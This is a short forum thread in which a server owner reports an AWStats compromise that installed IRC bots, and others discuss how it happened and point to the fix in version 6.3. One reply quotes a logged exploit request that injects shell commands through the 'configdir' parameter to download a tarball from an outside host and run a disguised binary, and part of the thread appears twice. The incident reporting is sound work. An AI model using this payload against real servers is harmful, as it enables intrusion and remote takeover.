2 weeks running awstats on my linux server and I am hacked.
somebody manage to get a perl script into awstats and ups, my server is supporting 12 irc bots.
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
I don't think it necessarily means awstats was the entry point. Maybe the person already had ftp access and the awstats cgi-bin was the place where the hacker had exec permissions. If he was dumb enough it is possible he left the logs intact, did you find anything there ?
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
awstats.pl can be used to drop IRC-Bots using the "configdir" argument.
I just discovered so.
"GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20www%2eirc%2dbots%2eorg%2f
x%2etar%2egz%3btar%20xvzf%20x%2etar%2egz%3bcd%20x%3b%2e%2fcrond%3becho%20e_exp%3b%2500 HTTP/1.1"
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
2 weeks running awstats on my linux server and I am hacked.
somebody manage to get a perl script into awstats and ups, my server is supporting 12 irc bots.
I don't think it necessarily means awstats was the entry point. Maybe the person already had ftp access and the awstats cgi-bin was the place where the hacker had exec permissions. If he was dumb enough it is possible he left the logs intact, did you find anything there ?
awstats.pl can be used to drop IRC-Bots using the "configdir" argument.
I just discovered so.
"GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20www%2eirc%2dbots%2eorg%2f
x%2etar%2egz%3btar%20xvzf%20x%2etar%2egz%3bcd%20x%3b%2e%2fcrond%3becho%20e_exp%3b%2500 HTTP/1.1"
This is a vulnerability which was fixed in version 6.3 of awstats
http://www.kb.cert.org/vuls/id/272296
http://msmvps.com/harrywaldron/archive/2005/02/09/35409.aspx
http://www.ypjain.com/simplesecurity/2005/02/awstats-security-hole.html
http://www.ypjain.com/simplesecurity/2005/02/awstats-security-hole-update.html